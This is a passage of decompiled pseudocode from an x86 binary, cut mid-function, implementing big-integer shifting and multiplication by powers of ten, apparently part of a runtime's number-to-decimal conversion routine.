                    										_t1040 = 0x1cc;
                    										_v936 = _t779;
                    										__eflags = _t779 << 2;
                    										E0044608E( &_v932, 0x1cc,  &_v1396, _t779 << 2);
                    										_t1251 =  &(_t1249[7]);
                    									} else {
                    										_v1396 = _v1396 & 0x00000000;
                    										_t1239 = 2;
                    										_v1392 = 0x100000;
                    										_v1400 = _t1239;
                    										__eflags = _t1037 - _t1239;
                    										if(_t1037 != _t1239) {
                    											L53:
                    											_t968 = _v1872 + 1;
                    											_t969 = _t968 & 0x0000001f;
                    											_t1091 = 0x20;
                    											_v1876 = _t969;
                    											_t1199 = _t968 >> 5;
                    											_v1872 = _t1199;
                    											_v1908 = _t1091 - _t969;
                    											_t972 = E00457150(1, _t1091 - _t969, 0);
                    											_t1093 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
                    											_t973 = _t972 - 1;
                    											_t108 =  &_v1896;
                    											 *_t108 = _v1896 & 0x00000000;
                    											__eflags =  *_t108;
                    											asm("bsr ecx, ecx");
                    											_v1884 = _t973;
                    											_v1912 =  !_t973;
                    											if( *_t108 == 0) {
                    												_t1094 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1094 = _t1093 + 1;
                    											}
                    											_t975 = 0x20;
                    											_t976 = _t975 - _t1094;
                    											_t1157 = _t1037 + _t1199;
                    											__eflags = _v1876 - _t976;
                    											_v1892 = _t1157;
                    											_t977 = _t976 & 0xffffff00 | _v1876 - _t976 > 0x00000000;
                    											__eflags = _t1157 - 0x73;
                    											_v1865 = _t977;
                    											_t1095 = _t1094 & 0xffffff00 | _t1157 - 0x00000073 > 0x00000000;
                    											__eflags = _t1157 - 0x73;
                    											if(_t1157 != 0x73) {
                    												L59:
                    												_t978 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t977;
                    												if(_t977 == 0) {
                    													goto L59;
                    												} else {
                    													_t978 = 1;
                    												}
                    											}
                    											__eflags = _t1095;
                    											if(_t1095 != 0) {
                    												L81:
                    												__eflags = 0;
                    												_t1040 = 0x1cc;
                    												_v1400 = 0;
                    												_v472 = 0;
                    												E0044608E( &_v468, 0x1cc,  &_v1396, 0);
                    												_t1249 =  &(_t1249[4]);
                    											} else {
                    												__eflags = _t978;
                    												if(_t978 != 0) {
                    													goto L81;
                    												} else {
                    													_t1096 = 0x72;
                    													__eflags = _t1157 - _t1096;
                    													if(_t1157 >= _t1096) {
                    														_t1157 = _t1096;
                    														_v1892 = _t1096;
                    													}
                    													_t988 = _t1157;
                    													_v1880 = _t988;
                    													__eflags = _t1157 - 0xffffffff;
                    													if(_t1157 != 0xffffffff) {
                    														_t1158 = _v1872;
                    														_t1241 = _t1157 - _t1158;
                    														__eflags = _t1241;
                    														_t1100 =  &_v468 + _t1241 * 4;
                    														_v1888 = _t1100;
                    														while(1) {
                    															__eflags = _t988 - _t1158;
                    															if(_t988 < _t1158) {
                    																break;
                    															}
                    															__eflags = _t1241 - _t1037;
                    															if(_t1241 >= _t1037) {
                    																_t1202 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1202 =  *_t1100;
                    															}
                    															__eflags = _t1241 - 1 - _t1037;
                    															if(_t1241 - 1 >= _t1037) {
                    																_t993 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t993 =  *(_t1100 - 4);
                    															}
                    															_t996 = _v1880;
                    															_t1100 = _v1888 - 4;
                    															_v1888 = _t1100;
                    															 *(_t1247 + _t996 * 4 - 0x1d0) = (_t1202 & _v1884) << _v1876 | (_t993 & _v1912) >> _v1908;
                    															_t988 = _t996 - 1;
                    															_t1241 = _t1241 - 1;
                    															_v1880 = _t988;
                    															__eflags = _t988 - 0xffffffff;
                    															if(_t988 != 0xffffffff) {
                    																_t1037 = _v472;
                    																continue;
                    															}
                    															break;
                    														}
                    														_t1157 = _v1892;
                    														_t1199 = _v1872;
                    														_t1239 = 2;
                    													}
                    													__eflags = _t1199;
                    													if(_t1199 != 0) {
                    														__eflags = 0;
                    														memset( &_v468, 0, _t1199 << 2);
                    														_t1249 =  &(_t1249[3]);
                    													}
                    													__eflags = _v1865;
                    													_t1040 = 0x1cc;
                    													if(_v1865 == 0) {
                    														_v472 = _t1157;
                    													} else {
                    														_v472 = _t1157 + 1;
                    													}
                    												}
                    											}
                    											_v1392 = _v1392 & 0x00000000;
                    											_v1396 = _t1239;
                    											_v1400 = 1;
                    											_v936 = 1;
                    											_push(4);
                    										} else {
                    											_t1104 = 0;
                    											__eflags = 0;
                    											while(1) {
                    												__eflags =  *((intOrPtr*)(_t1247 + _t1104 - 0x570)) -  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0));
                    												if( *((intOrPtr*)(_t1247 + _t1104 - 0x570)) !=  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0))) {
                    													goto L53;
                    												}
                    												_t1104 = _t1104 + 4;
                    												__eflags = _t1104 - 8;
                    												if(_t1104 != 8) {
                    													continue;
                    												} else {
                    													_t999 = _v1872 + 2;
                    													_t1000 = _t999 & 0x0000001f;
                    													_t1105 = 0x20;
                    													_t1106 = _t1105 - _t1000;
                    													_v1888 = _t1000;
                    													_t1243 = _t999 >> 5;
                    													_v1876 = _t1243;
                    													_v1908 = _t1106;
                    													_t1003 = E00457150(1, _t1106, 0);
                    													_v1896 = _v1896 & 0x00000000;
                    													_t1004 = _t1003 - 1;
                    													__eflags = _t1004;
                    													asm("bsr ecx, edi");
                    													_v1884 = _t1004;
                    													_v1912 =  !_t1004;
                    													if(_t1004 == 0) {
                    														_t1107 = 0;
                    														__eflags = 0;
                    													} else {
                    														_t1107 = _t1106 + 1;
                    													}
                    													_t1006 = 0x20;
                    													_t1007 = _t1006 - _t1107;
                    													_t1160 = _t1243 + 2;
                    													__eflags = _v1888 - _t1007;
                    													_v1880 = _t1160;
                    													_t1008 = _t1007 & 0xffffff00 | _v1888 - _t1007 > 0x00000000;
                    													__eflags = _t1160 - 0x73;
                    													_v1865 = _t1008;
                    													_t1108 = _t1107 & 0xffffff00 | _t1160 - 0x00000073 > 0x00000000;
                    													__eflags = _t1160 - 0x73;
                    													if(_t1160 != 0x73) {
                    														L28:
                    														_t1009 = 0;
                    														__eflags = 0;
                    													} else {
                    														__eflags = _t1008;
                    														if(_t1008 == 0) {
                    															goto L28;
                    														} else {
                    															_t1009 = 1;
                    														}
                    													}
                    													__eflags = _t1108;
                    													if(_t1108 != 0) {
                    														L50:
                    														__eflags = 0;
                    														_t1040 = 0x1cc;
                    														_v1400 = 0;
                    														_v472 = 0;
                    														E0044608E( &_v468, 0x1cc,  &_v1396, 0);
                    														_t1249 =  &(_t1249[4]);
                    													} else {
                    														__eflags = _t1009;
                    														if(_t1009 != 0) {
                    															goto L50;
                    														} else {
                    															_t1111 = 0x72;
                    															__eflags = _t1160 - _t1111;
                    															if(_t1160 >= _t1111) {
                    																_t1160 = _t1111;
                    																_v1880 = _t1111;
                    															}
                    															_t1112 = _t1160;
                    															_v1892 = _t1112;
                    															__eflags = _t1160 - 0xffffffff;
                    															if(_t1160 != 0xffffffff) {
                    																_t1161 = _v1876;
                    																_t1245 = _t1160 - _t1161;
                    																__eflags = _t1245;
                    																_t1019 =  &_v468 + _t1245 * 4;
                    																_v1872 = _t1019;
                    																while(1) {
                    																	__eflags = _t1112 - _t1161;
                    																	if(_t1112 < _t1161) {
                    																		break;
                    																	}
                    																	__eflags = _t1245 - _t1037;
                    																	if(_t1245 >= _t1037) {
                    																		_t1208 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1208 =  *_t1019;
                    																	}
                    																	__eflags = _t1245 - 1 - _t1037;
                    																	if(_t1245 - 1 >= _t1037) {
                    																		_t1021 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1021 =  *(_v1872 - 4);
                    																	}
                    																	_t1117 = _v1892;
                    																	 *(_t1247 + _t1117 * 4 - 0x1d0) = (_t1021 & _v1912) >> _v1908 | (_t1208 & _v1884) << _v1888;
                    																	_t1112 = _t1117 - 1;
                    																	_t1245 = _t1245 - 1;
                    																	_t1019 = _v1872 - 4;
                    																	_v1892 = _t1112;
                    																	_v1872 = _t1019;
                    																	__eflags = _t1112 - 0xffffffff;
                    																	if(_t1112 != 0xffffffff) {
                    																		_t1037 = _v472;
                    																		continue;
                    																	}
                    																	break;
                    																}
                    																_t1160 = _v1880;
                    																_t1243 = _v1876;
                    															}
                    															__eflags = _t1243;
                    															if(_t1243 != 0) {
                    																__eflags = 0;
                    																memset( &_v468, 0, _t1243 << 2);
                    																_t1249 =  &(_t1249[3]);
                    															}
                    															__eflags = _v1865;
                    															_t1040 = 0x1cc;
                    															if(_v1865 == 0) {
                    																_v472 = _t1160;
                    															} else {
                    																_v472 = _t1160 + 1;
                    															}
                    														}
                    													}
                    													_v1392 = _v1392 & 0x00000000;
                    													_t1014 = 4;
                    													__eflags = 1;
                    													_v1396 = _t1014;
                    													_v1400 = 1;
                    													_v936 = 1;
                    													_push(_t1014);
                    												}
                    												goto L52;
                    											}
                    											goto L53;
                    										}
                    										L52:
                    										_push( &_v1396);
                    										_push(_t1040);
                    										_push( &_v932);
                    										E0044608E();
                    										_t1251 =  &(_t1249[4]);
                    									}
                    									_t784 = _v1904;
                    									_t1061 = 0xa;
                    									_v1912 = _t1061;
                    									__eflags = _t784;
                    									if(_t784 < 0) {
                    										_t785 =  ~_t784;
                    										_t786 = _t785 / _t1061;
                    										_v1880 = _t786;
                    										_t1062 = _t785 % _t1061;
                    										_v1884 = _t1062;
                    										__eflags = _t786;
                    										if(_t786 == 0) {
                    											L249:
                    											__eflags = _t1062;
                    											if(_t1062 != 0) {
                    												_t825 =  *(0x45d74c + _t1062 * 4);
                    												_v1896 = _t825;
                    												__eflags = _t825;
                    												if(_t825 == 0) {
                    													L260:
                    													__eflags = 0;
                    													_push(0);
                    													_v472 = 0;
                    													_v2408 = 0;
                    													goto L261;
                    												} else {
                    													__eflags = _t825 - 1;
                    													if(_t825 != 1) {
                    														_t1073 = _v472;
                    														__eflags = _t1073;
                    														if(_t1073 != 0) {
                    															_t1177 = 0;
                    															_t1225 = 0;
                    															__eflags = 0;
                    															do {
                    																_t1131 = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) >> 0x20;
                    																 *(_t1247 + _t1225 * 4 - 0x1d0) = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) + _t1177;
                    																_t825 = _v1896;
                    																asm("adc edx, 0x0");
                    																_t1225 = _t1225 + 1;
                    																_t1177 = _t1131;
                    																__eflags = _t1225 - _t1073;
                    															} while (_t1225 != _t1073);
                    															__eflags = _t1177;
                    															if(_t1177 != 0) {
                    																_t832 = _v472;
                    																__eflags = _t832 - 0x73;
                    																if(_t832 >= 0x73) {
                    																	goto L260;
                    																} else {
                    																	 *(_t1247 + _t832 * 4 - 0x1d0) = _t1177;
                    																	_v472 = _v472 + 1;
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t786 - 0x26;
                    												if(_t786 > 0x26) {
                    													_t786 = 0x26;
                    												}
                    												_t1074 =  *(0x45d6b6 + _t786 * 4) & 0x000000ff;
                    												_v1872 = _t786;
                    												_v1400 = ( *(0x45d6b6 + _t786 * 4) & 0x000000ff) + ( *(0x45d6b7 + _t786 * 4) & 0x000000ff);
                    												E004368A0(_t1074 << 2,  &_v1396, 0, _t1074 << 2);
                    												_t843 = E00436320( &(( &_v1396)[_t1074]), 0x45cdb0 + ( *(0x45d6b4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x45d6b7 + _t786 * 4) & 0x000000ff) << 2);
                    												_t1075 = _v1400;
                    												_t1251 =  &(_t1251[6]);
                    												_v1892 = _t1075;
                    												__eflags = _t1075 - 1;
                    												if(_t1075 > 1) {
                    													__eflags = _v472 - 1;
                    													if(_v472 > 1) {
                    														__eflags = _t1075 - _v472;
                    														_t1180 =  &_v1396;
                    														_t844 = _t843 & 0xffffff00 | _t1075 - _v472 > 0x00000000;
                    														__eflags = _t844;
                    														if(_t844 != 0) {
                    															_t1132 =  &_v468;
                    														} else {
                    															_t1180 =  &_v468;
                    															_t1132 =  &_v1396;
                    														}
                    														_v1908 = _t1132;
                    														__eflags = _t844;
                    														if(_t844 == 0) {
                    															_t1075 = _v472;
                    														}
                    														_v1876 = _t1075;
                    														__eflags = _t844;
                    														if(_t844 != 0) {
                    															_v1892 = _v472;
                    														}
                    														_t1133 = 0;
                    														_t1227 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1075;
                    														if(_t1075 == 0) {
                    															L243:
                    															_v472 = _t1133;
                    															_t846 = _t1133 << 2;
                    															__eflags = _t846;
                    															_push(_t846);
                    															_t847 =  &_v1860;
                    															goto L244;
                    														} else {
                    															_t1181 = _t1180 -  &_v1860;
                    															__eflags = _t1181;
                    															_v1928 = _t1181;
                    															do {
                    																_t854 =  *(_t1247 + _t1181 + _t1227 * 4 - 0x740);
                    																_v1896 = _t854;
                    																__eflags = _t854;
                    																if(_t854 != 0) {
                    																	_t855 = 0;
                    																	_t1182 = 0;
                    																	_t1076 = _t1227;
                    																	_v1888 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L240:
                    																		__eflags = _t1076 - 0x73;
                    																		if(_t1076 == 0x73) {
                    																			goto L258;
                    																		} else {
                    																			_t1181 = _v1928;
                    																			_t1075 = _v1876;
                    																			goto L242;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1076 - 0x73;
                    																			if(_t1076 == 0x73) {
                    																				goto L235;
                    																			}
                    																			__eflags = _t1076 - _t1133;
                    																			if(_t1076 == _t1133) {
                    																				 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) & 0x00000000;
                    																				_t867 = _t855 + 1 + _t1227;
                    																				__eflags = _t867;
                    																				_v1864 = _t867;
                    																				_t855 = _v1888;
                    																			}
                    																			_t862 =  *(_v1908 + _t855 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) + _t862 * _v1896 + _t1182;
                    																			asm("adc edx, 0x0");
                    																			_t855 = _v1888 + 1;
                    																			_t1076 = _t1076 + 1;
                    																			_v1888 = _t855;
                    																			_t1182 = _t862 * _v1896 >> 0x20;
                    																			_t1133 = _v1864;
                    																			__eflags = _t855 - _v1892;
                    																			if(_t855 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L235;
                    																			}
                    																			while(1) {
                    																				L235:
                    																				__eflags = _t1182;
                    																				if(_t1182 == 0) {
                    																					goto L240;
                    																				}
                    																				__eflags = _t1076 - 0x73;
                    																				if(_t1076 == 0x73) {
                    																					goto L258;
                    																				} else {
                    																					__eflags = _t1076 - _t1133;
                    																					if(_t1076 == _t1133) {
                    																						_t558 = _t1247 + _t1076 * 4 - 0x740;
                    																						 *_t558 =  *(_t1247 + _t1076 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t558;
                    																						_t564 = _t1076 + 1; // 0x1
                    																						_v1864 = _t564;
                    																					}
                    																					_t860 = _t1182;
                    																					_t1182 = 0;
                    																					 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) + _t860;
                    																					_t1133 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1076 = _t1076 + 1;
                    																					continue;
                    																				}
                    																				goto L246;
                    																			}
                    																			goto L240;
                    																		}
                    																		goto L235;
                    																	}
                    																} else {
                    																	__eflags = _t1227 - _t1133;
                    																	if(_t1227 == _t1133) {
                    																		 *(_t1247 + _t1227 * 4 - 0x740) =  *(_t1247 + _t1227 * 4 - 0x740) & _t854;
                    																		_t526 = _t1227 + 1; // 0x1
                    																		_t1133 = _t526;
                    																		_v1864 = _t1133;
                    																	}
                    																	goto L242;
                    																}
                    																goto L246;
                    																L242:
                    																_t1227 = _t1227 + 1;
                    																__eflags = _t1227 - _t1075;
                    															} while (_t1227 != _t1075);
                    															goto L243;
                    														}
                    													} else {
                    														_t1183 = _v468;
                    														_v472 = _t1075;
                    														E0044608E( &_v468, _t1040,  &_v1396, _t1075 << 2);
                    														_t1251 =  &(_t1251[4]);
                    														__eflags = _t1183;
                    														if(_t1183 == 0) {
                    															goto L203;
                    														} else {
                    															__eflags = _t1183 - 1;
                    															if(_t1183 == 1) {
                    																goto L245;
                    															} else {
                    																__eflags = _v472;
                    																if(_v472 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t1077 = 0;
                    																	_v1896 = _v472;
                    																	_t1228 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t876 = _t1183;
                    																		_t1134 = _t876 *  *(_t1247 + _t1228 * 4 - 0x1d0) >> 0x20;
                    																		 *(_t1247 + _t1228 * 4 - 0x1d0) = _t876 *  *(_t1247 + _t1228 * 4 - 0x1d0) + _t1077;
                    																		asm("adc edx, 0x0");
                    																		_t1228 = _t1228 + 1;
                    																		_t1077 = _t1134;
                    																		__eflags = _t1228 - _v1896;
                    																	} while (_t1228 != _v1896);
                    																	goto L208;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													_t1184 = _v1396;
                    													__eflags = _t1184;
                    													if(_t1184 != 0) {
                    														__eflags = _t1184 - 1;
                    														if(_t1184 == 1) {
                    															goto L245;
                    														} else {
                    															__eflags = _v472;
                    															if(_v472 == 0) {
                    																goto L245;
                    															} else {
                    																_t1078 = 0;
                    																_v1896 = _v472;
                    																_t1229 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t881 = _t1184;
                    																	_t1135 = _t881 *  *(_t1247 + _t1229 * 4 - 0x1d0) >> 0x20;
                    																	 *(_t1247 + _t1229 * 4 - 0x1d0) = _t881 *  *(_t1247 + _t1229 * 4 - 0x1d0) + _t1078;
                    																	asm("adc edx, 0x0");
                    																	_t1229 = _t1229 + 1;
                    																	_t1078 = _t1135;
                    																	__eflags = _t1229 - _v1896;
                    																} while (_t1229 != _v1896);
                    																L208:
                    																__eflags = _t1077;
                    																if(_t1077 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t879 = _v472;
                    																	__eflags = _t879 - 0x73;
                    																	if(_t879 >= 0x73) {
                    																		L258:
                    																		_v2408 = 0;
                    																		_v472 = 0;
                    																		E0044608E( &_v468, _t1040,  &_v2404, 0);
                    																		_t1251 =  &(_t1251[4]);
                    																		_t850 = 0;
                    																	} else {
                    																		 *(_t1247 + _t879 * 4 - 0x1d0) = _t1077;
                    																		_v472 = _v472 + 1;
                    																		goto L245;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														L203:
                    														_v2408 = 0;
                    														_v472 = 0;
                    														_push(0);
                    														_t847 =  &_v2404;
                    														L244:
                    														_push(_t847);
                    														_push(_t1040);
                    														_push( &_v468);
                    														E0044608E();
                    														_t1251 =  &(_t1251[4]);
                    														L245:
                    														_t850 = 1;
                    													}
                    												}
                    												L246:
                    												__eflags = _t850;
                    												if(_t850 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_v472 = _v472 & 0x00000000;
                    													_push(0);
                    													L261:
                    													_push( &_v2404);
                    													_t828 =  &_v468;
                    													goto L262;
                    												} else {
                    													goto L247;
                    												}
                    												goto L263;
                    												L247:
                    												_t786 = _v1880 - _v1872;
                    												__eflags = _t786;
                    												_v1880 = _t786;
                    											} while (_t786 != 0);
                    											_t1062 = _v1884;
                    											goto L249;
                    										}
                    									} else {
                    										_t884 = _t784 / _t1061;
                    										_v1908 = _t884;
                    										_t1079 = _t784 % _t1061;
                    										_v1896 = _t1079;
                    										__eflags = _t884;
                    										if(_t884 == 0) {
                    											L184:
                    											__eflags = _t1079;
                    											if(_t1079 != 0) {
                    												_t1185 =  *(0x45d74c + _t1079 * 4);
                    												__eflags = _t1185;
                    												if(_t1185 != 0) {
                    													__eflags = _t1185 - 1;
                    													if(_t1185 != 1) {
                    														_t885 = _v936;
                    														_v1896 = _t885;
                    														__eflags = _t885;
                    														if(_t885 != 0) {
                    															_t1230 = 0;
                    															_t1080 = 0;
                    															__eflags = 0;
                    															do {
                    																_t886 = _t1185;
                    																_t1139 = _t886 *  *(_t1247 + _t1080 * 4 - 0x3a0) >> 0x20;
                    																 *(_t1247 + _t1080 * 4 - 0x3a0) = _t886 *  *(_t1247 + _t1080 * 4 - 0x3a0) + _t1230;
                    																asm("adc edx, 0x0");
                    																_t1080 = _t1080 + 1;
                    																_t1230 = _t1139;
                    																__eflags = _t1080 - _v1896;
                    															} while (_t1080 != _v1896);
                    															__eflags = _t1230;
                    															if(_t1230 != 0) {
                    																_t889 = _v936;
                    																__eflags = _t889 - 0x73;
                    																if(_t889 >= 0x73) {
                    																	goto L186;
                    																} else {
                    																	 *(_t1247 + _t889 * 4 - 0x3a0) = _t1230;
                    																	_v936 = _v936 + 1;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													L186:
                    													_v2408 = 0;
                    													_v936 = 0;
                    													_push(0);
                    													goto L190;
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t884 - 0x26;
                    												if(_t884 > 0x26) {
                    													_t884 = 0x26;
                    												}
                    												_t1081 =  *(0x45d6b6 + _t884 * 4) & 0x000000ff;
                    												_v1888 = _t884;
                    												_v1400 = ( *(0x45d6b6 + _t884 * 4) & 0x000000ff) + ( *(0x45d6b7 + _t884 * 4) & 0x000000ff);
                    												E004368A0(_t1081 << 2,  &_v1396, 0, _t1081 << 2);
                    												_t902 = E00436320( &(( &_v1396)[_t1081]), 0x45cdb0 + ( *(0x45d6b4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x45d6b7 + _t884 * 4) & 0x000000ff) << 2);
                    												_t1082 = _v1400;
                    												_t1251 =  &(_t1251[6]);
                    												_v1892 = _t1082;
                    												__eflags = _t1082 - 1;
                    												if(_t1082 > 1) {
                    													__eflags = _v936 - 1;
                    													if(_v936 > 1) {
                    														__eflags = _t1082 - _v936;
                    														_t1188 =  &_v1396;
                    														_t903 = _t902 & 0xffffff00 | _t1082 - _v936 > 0x00000000;
                    														__eflags = _t903;
                    														if(_t903 != 0) {
                    															_t1140 =  &_v932;
                    														} else {
                    															_t1188 =  &_v932;
                    															_t1140 =  &_v1396;
                    														}
                    														_v1876 = _t1140;
                    														__eflags = _t903;
                    														if(_t903 == 0) {
                    															_t1082 = _v936;
                    														}
                    														_v1880 = _t1082;
                    														__eflags = _t903;
                    														if(_t903 != 0) {
                    															_v1892 = _v936;
                    														}
                    														_t1141 = 0;
                    														_t1232 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1082;
                    														if(_t1082 == 0) {
                    															L177:
                    															_v936 = _t1141;
                    															_t905 = _t1141 << 2;
                    															__eflags = _t905;
                    															goto L178;
                    														} else {
                    															_t1189 = _t1188 -  &_v1860;
                    															__eflags = _t1189;
                    															_v1928 = _t1189;
                    															do {
                    																_t913 =  *(_t1247 + _t1189 + _t1232 * 4 - 0x740);
                    																_v1884 = _t913;
                    																__eflags = _t913;
                    																if(_t913 != 0) {
                    																	_t914 = 0;
                    																	_t1190 = 0;
                    																	_t1083 = _t1232;
                    																	_v1872 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L174:
                    																		__eflags = _t1083 - 0x73;
                    																		if(_t1083 == 0x73) {
                    																			goto L187;
                    																		} else {
                    																			_t1189 = _v1928;
                    																			_t1082 = _v1880;
                    																			goto L176;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1083 - 0x73;
                    																			if(_t1083 == 0x73) {
                    																				goto L169;
                    																			}
                    																			__eflags = _t1083 - _t1141;
                    																			if(_t1083 == _t1141) {
                    																				 *(_t1247 + _t1083 * 4 - 0x740) =  *(_t1247 + _t1083 * 4 - 0x740) & 0x00000000;
                    																				_t926 = _t914 + 1 + _t1232;
                    																				__eflags = _t926;
                    																				_v1864 = _t926;
                    																				_t914 = _v1872;
                    																			}
                    																			_t921 =  *(_v1876 + _t914 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1247 + _t1083 * 4 - 0x740) =  *(_t1247 + _t1083 * 4 - 0x740) + _t921 * _v1884 + _t1190;
                    																			asm("adc edx, 0x0");
                    																			_t914 = _v1872 + 1;
                    																			_t1083 = _t1083 + 1;
                    																			_v1872 = _t914;
                    																			_t1190 = _t921 * _v1884 >> 0x20;
                    																			_t1141 = _v1864;
                    																			__eflags = _t914 - _v1892;
                    																			if(_t914 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L169;
                    																			}
                    																			while(1) {
                    																				L169:
                    																				__eflags = _t1190;
                    																				if(_t1190 == 0) {
                    																					goto L174;
                    																				}
                    																				__eflags = _t1083 - 0x73;
                    																				if(_t1083 == 0x73) {
                    																					L187:
                    																					__eflags = 0;
                    																					_v2408 = 0;
                    																					_v936 = 0;
                    																					_push(0);
                    																					_t916 =  &_v2404;
                    																					goto L188;
                    																				} else {
                    																					__eflags = _t1083 - _t1141;
                    																					if(_t1083 == _t1141) {
                    																						_t370 = _t1247 + _t1083 * 4 - 0x740;
                    																						 *_t370 =  *(_t1247 + _t1083 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t370;
                    																						_t376 = _t1083 + 1; // 0x1
                    																						_v1864 = _t376;
                    																					}
                    																					_t919 = _t1190;
                    																					_t1190 = 0;
                    																					 *(_t1247 + _t1083 * 4 - 0x740) =  *(_t1247 + _t1083 * 4 - 0x740) + _t919;
                    																					_t1141 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1083 = _t1083 + 1;
                    																					continue;
                    																				}
                    																				goto L181;
                    																			}
                    																			goto L174;
                    																		}
                    																		goto L169;
                    																	}
                    																} else {
                    																	__eflags = _t1232 - _t1141;
                    																	if(_t1232 == _t1141) {
                    																		 *(_t1247 + _t1232 * 4 - 0x740) =  *(_t1247 + _t1232 * 4 - 0x740) & _t913;
                    																		_t338 = _t1232 + 1; // 0x1
                    																		_t1141 = _t338;
                    																		_v1864 = _t1141;
                    																	}
                    																	goto L176;
                    																}
                    																goto L181;
                    																L176:
                    																_t1232 = _t1232 + 1;
                    																__eflags = _t1232 - _t1082;
                    															} while (_t1232 != _t1082);
                    															goto L177;
                    														}
                    													} else {
                    														_t1191 = _v932;
                    														_v936 = _t1082;
                    														E0044608E( &_v932, _t1040,  &_v1396, _t1082 << 2);
                    														_t1251 =  &(_t1251[4]);
                    														__eflags = _t1191;
                    														if(_t1191 != 0) {
                    															__eflags = _t1191 - 1;
                    															if(_t1191 == 1) {
                    																goto L180;
                    															} else {
                    																__eflags = _v936;
                    																if(_v936 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t1084 = 0;
                    																	_v1884 = _v936;
                    																	_t1233 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t934 = _t1191;
                    																		_t1142 = _t934 *  *(_t1247 + _t1233 * 4 - 0x3a0) >> 0x20;
                    																		 *(_t1247 + _t1233 * 4 - 0x3a0) = _t934 *  *(_t1247 + _t1233 * 4 - 0x3a0) + _t1084;
                    																		asm("adc edx, 0x0");
                    																		_t1233 = _t1233 + 1;
                    																		_t1084 = _t1142;
                    																		__eflags = _t1233 - _v1884;
                    																	} while (_t1233 != _v1884);
                    																	goto L149;
                    																}
                    															}
                    														} else {
                    															_v1400 = 0;
                    															_v936 = 0;
                    															_push(0);
                    															_t906 =  &_v1396;
                    															goto L179;
                    														}
                    													}
                    												} else {
                    													_t1192 = _v1396;
                    													__eflags = _t1192;
                    													if(_t1192 != 0) {
                    														__eflags = _t1192 - 1;
                    														if(_t1192 == 1) {
                    															goto L180;
                    														} else {
                    															__eflags = _v936;
                    															if(_v936 == 0) {
                    																goto L180;
                    															} else {
                    																_t1085 = 0;
                    																_v1884 = _v936;
                    																_t1234 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t941 = _t1192;
                    																	_t1143 = _t941 *  *(_t1247 + _t1234 * 4 - 0x3a0) >> 0x20;
                    																	 *(_t1247 + _t1234 * 4 - 0x3a0) = _t941 *  *(_t1247 + _t1234 * 4 - 0x3a0) + _t1085;
                    																	asm("adc edx, 0x0");
                    																	_t1234 = _t1234 + 1;
                    																	_t1085 = _t1143;
                    																	__eflags = _t1234 - _v1884;
                    																} while (_t1234 != _v1884);
                    																L149:
                    																__eflags = _t1084;
                    																if(_t1084 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t937 = _v936;
                    																	__eflags = _t937 - 0x73;
                    																	if(_t937 < 0x73) {
                    																		 *(_t1247 + _t937 * 4 - 0x3a0) = _t1084;
                    																		_v936 = _v936 + 1;
                    																		goto L180;
                    																	} else {
                    																		_v1400 = 0;
                    																		_v936 = 0;
                    																		_push(0);
                    																		_t916 =  &_v1396;
                    																		L188:
                    																		_push(_t916);
                    																		_push(_t1040);
                    																		_push( &_v932);
                    																		E0044608E();
                    																		_t1251 =  &(_t1251[4]);
                    																		_t909 = 0;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t905 = 0;
                    														_v1864 = 0;
                    														_v936 = 0;
                    														L178:
                    														_push(_t905);
                    														_t906 =  &_v1860;
                    														L179:
                    														_push(_t906);
                    														_push(_t1040);
                    														_push( &_v932);
                    														E0044608E();
                    														_t1251 =  &(_t1251[4]);
                    														L180:
                    														_t909 = 1;
                    													}
                    												}
                    												L181:
                    												__eflags = _t909;
                    												if(_t909 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_t404 =  &_v936;
                    													 *_t404 = _v936 & 0x00000000;
                    													__eflags =  *_t404;
                    													_push(0);
                    													L190:
                    													_push( &_v2404);
                    													_t828 =  &_v932;
                    													L262:
                    													_push(_t1040);
                    													_push(_t828);
                    													E0044608E();
                    													_t1251 =  &(_t1251[4]);
                    												} else {
                    													goto L182;
                    												}
